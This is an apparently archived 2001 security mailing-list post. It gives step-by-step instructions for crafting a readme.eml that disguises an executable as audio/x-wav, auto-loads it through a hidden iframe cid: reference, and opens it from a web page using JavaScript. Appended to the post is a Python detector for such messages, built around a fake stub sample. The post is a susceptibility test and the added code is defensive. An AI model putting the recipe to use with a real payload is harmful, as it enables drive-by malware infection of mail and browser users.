Hello- I became concerned with this after I read someone had actually executed the code by visiting a web site. (my servers are patched, so I'm not worried about that)

I have duplicated the readme.eml message, only using notepad.exe instead. If I use an actual .wav file, readme.eml is opened from the web page and the wav file opens and plays in media player. If I use notepad.exe (Content-Type: audio/x-wav), I am prompted as to whether I would like to download or not. If I select run from current location, it runs notepad. This is the behavior I would like, so no malicious code runs without me knowing. However, I am using Media Player 6.4, so I don't know if it makes a difference.

To create your own readme.eml to test if you are susceptible, follow these steps:

1. Create a dummy message in OE. You don't have to address it to anyone.
2. Attach notepad.exe.
3. Save as readme.eml.
4. Edit the readme.eml with notepad. Find the html body and replace with:
   <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML>
5. Find the notepad.exe attachment section. Change Content-Type to audio/x-wav
6. (necessary?) Remove Content-Disposition: attachment;filename="NOTEPAD.EXE" header.
7. Add the following header: Content-ID: <EA4DMGBP9p>
   This is apparently to link the iframe <src> tag.
8. Save the file.
9. Create a web page that includes the code:
   <script language="JavaScript"> window.open("readme.eml", null, "resizable=yes,top=0,left=0") </script>
   Make sure readme.eml is in the same directory.
10. Open the web page and see what happens.

Like I said, I was prompted. I hope you are too because this would be very serious if it could be spread *that* easy.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
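A defender-side check for the message layout described in the post above, added here as an example that is not part of the original message: it parses an .eml with Python's email module, flags non-text parts whose decoded payload carries an executable signature regardless of the declared Content-Type, and reports whether the HTML body auto-loads them through a src=cid: reference. The sample message is constructed; its "attachment" is a 16-byte fake MZ stub, not notepad.exe.

```python
import base64
import email
import re
from email import policy

# Constructed sample in the layout the post describes: an HTML body with a
# hidden iframe pointing at a cid: part, and that part declared audio/x-wav
# while its payload is a fake 16-byte MZ/PE stub (not a real executable).
FAKE_PE_B64 = base64.b64encode(b"MZ" + b"\x00" * 14).decode()
SAMPLE_EML = f"""From: test@example.invalid
MIME-Version: 1.0
Content-Type: multipart/related; boundary="b1"

--b1
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0></iframe></BODY></HTML>
--b1
Content-Type: audio/x-wav; name="notepad.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

{FAKE_PE_B64}
--b1--
""".encode()

# Magic bytes that no audio/image/text part should legitimately start with.
EXEC_MAGIC = {b"MZ": "PE executable", b"\x7fELF": "ELF executable"}
CID_REF = re.compile(r"""src\s*=\s*["']?cid:([^"'\s>]+)""", re.I)


def find_suspicious_parts(raw: bytes):
    """Return (content_type, content_id, kind, auto_loaded) per executable part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    cid_refs = set()  # Content-IDs the HTML body pulls in via src=cid:
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            cid_refs.update(c.lower() for c in CID_REF.findall(part.get_content()))
    findings = []
    for part in msg.walk():
        if part.is_multipart() or part.get_content_maintype() == "text":
            continue
        payload = part.get_payload(decode=True) or b""  # undo base64/QP
        cid = (part.get("Content-ID") or "").strip("<> ").lower()
        for magic, kind in EXEC_MAGIC.items():
            if payload.startswith(magic):
                findings.append((part.get_content_type(), cid, kind, cid in cid_refs))
    return findings
```

A part that is declared audio/x-wav but starts with MZ is the mismatch the post relies on; a real WAV would start with RIFF and produce no finding.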
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 15:24:54 PDT